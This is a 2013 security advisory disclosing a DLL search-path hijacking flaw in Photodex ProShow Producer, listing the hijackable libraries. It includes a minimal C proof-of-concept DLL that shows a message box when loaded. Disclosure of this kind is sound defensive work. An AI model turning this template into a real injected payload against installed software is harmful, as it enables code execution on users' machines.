Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Uncontrolled Search Path Element [CWE-427] Date found: 2013-02-23 Date published: 2013-02-23 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Photodex ProShow Producer v5.0.3297, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- An insecure library loading vulnerability has been identified in Photodex ProShow Producer v5.0.3297. The application uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of a library in the application path, the program will load it before the legitimate version. This allows an attacker to inject custom code that will be run with the privilege of the program or user executing the program. The following libraries could be hijacked on this way: d3d9.dll dbghelp.dll dciman32.dll ddraw.dll midimap.dll mscms.dll ws2help.dll 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ // wine gcc -Wall -shared inject.c -o ddraw.dll #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { MessageBox(0,"DLL Injection","DLL Injection", 0); } return TRUE; } For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/48 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2013-02-23: Discovery of the vulnerability 2013-02-23: Full Disclosure because the vendor ignored previous reports. 8. REFERENCES ------------- http://security.inshell.net/advisory/48